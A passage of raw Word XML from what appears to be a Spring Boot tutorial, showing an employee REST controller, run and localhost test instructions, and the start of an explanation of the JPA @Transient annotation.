    <w:p w14:paraId="251ECEDB"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return employeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F26B4C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540AFDE0" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BA6E37"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ublic void deleteEmployee(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2306C7"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employeeRepository.deleteById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7CF1E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35618F09"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB91DA3" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Create the Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB30076"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Define a REST controller to expose the API endpoints and interact with the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025674A"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package com.example.demo.controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8531B" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429908C0"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import com.example.demo.model.Employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F194B5"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import com.example.demo.service.EmployeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E286E5"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import org.springframework.beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5DE04D"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import org.springframework.web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3272AD09" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7464FB8C"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import java.util.List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61131C6C"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import java.util.Optional;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35365119" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD1FB34"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EF2E7"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RequestMapping("/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD948E2"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lastRenderedPageBreak/>
        <w:t>public class EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CDCC17" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091B347F"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9B111"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rivate EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CADD93" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A328BE"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GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085EE0C9"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ublic List&lt;Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE237BE"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return employeeService.getAllEmployees();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13813AC2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7E9EF" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D965E47"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GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAB8535"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ublic Optional&lt;Employee&gt; getEmployeeById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B224407"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return employeeService.getEmployeeById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98B176"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCCB72" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69758424"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B4DF7"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ublic Employee createEmployee(@RequestBody Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CAE45B"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return employeeService.saveEmployee(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A758EA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AEB64" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF521C2"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DeleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D05CA"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public void deleteEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273E908"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employeeService.deleteEmployee(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF98CC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6855891F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A6140" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Run the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F198CF"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To run the application, you can use the following command in the terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30801EC2"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mvn spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28BEFC"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Once the application starts, it will automatically connect to the database using the JPA/Hibernate configuration, and you can interact with it via the exposed REST API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33A077" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Test the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239FC3AF"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You can use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postman</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cURL</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test the API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322CADE" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2034"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET all employees</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD8CA1" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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GET http://localhost:8080/employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098B821" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2034"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST a new employee</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDCBA4F" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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POST http://localhost:8080/employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E426F8" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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Body: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7A965" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA7576" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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    "department": "Engineering"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A90DAD" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E8F92" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2034"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET an employee by ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56B930" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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GET http://localhost:8080/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B6EE3" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2034"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE an employee</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9A519" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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DELETE http://localhost:8080/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F977C" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD35400" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By following these steps, you will be able to connect a </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> application with a </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA/Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Spring Boot handles most of the heavy lifting for you, including configuration, entity mapping, and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E923C" w14:textId="78730014"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31CF1BF">
          <v:rect id="_x0000_i2512" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B78E1BF" w14:textId="12D45E25" w:rsidR="00071C81" w:rsidRPr="00CE4B95" w:rsidRDefault="00624897">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="576" w:name="_Toc196308056"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00860857" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidR="00AC1FA9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ransient in spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00071C81" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="576"/>
    </w:p>
    <w:p w14:paraId="6C3C9FDD" w14:textId="1927AEB1" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08"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In Spring Boot (and Java in general), the @Transient annotation is used to mark a field in an entity that should </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> be persisted to the database. It indicates that the field should be ignored during the process of serializing an entity object to the database (when using JPA or Hibernate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCDD0ED" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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This annotation is primarily used in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., classes that are mapped to database tables) to prevent certain fields from being saved in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED506D0" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08"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lastRenderedPageBreak/>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D733700" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2035"/>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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It is used to mark a field or property in an entity that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not part of the database</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and should not be mapped to a column in the table.</w:t>
      </w:r>
    </w:p>
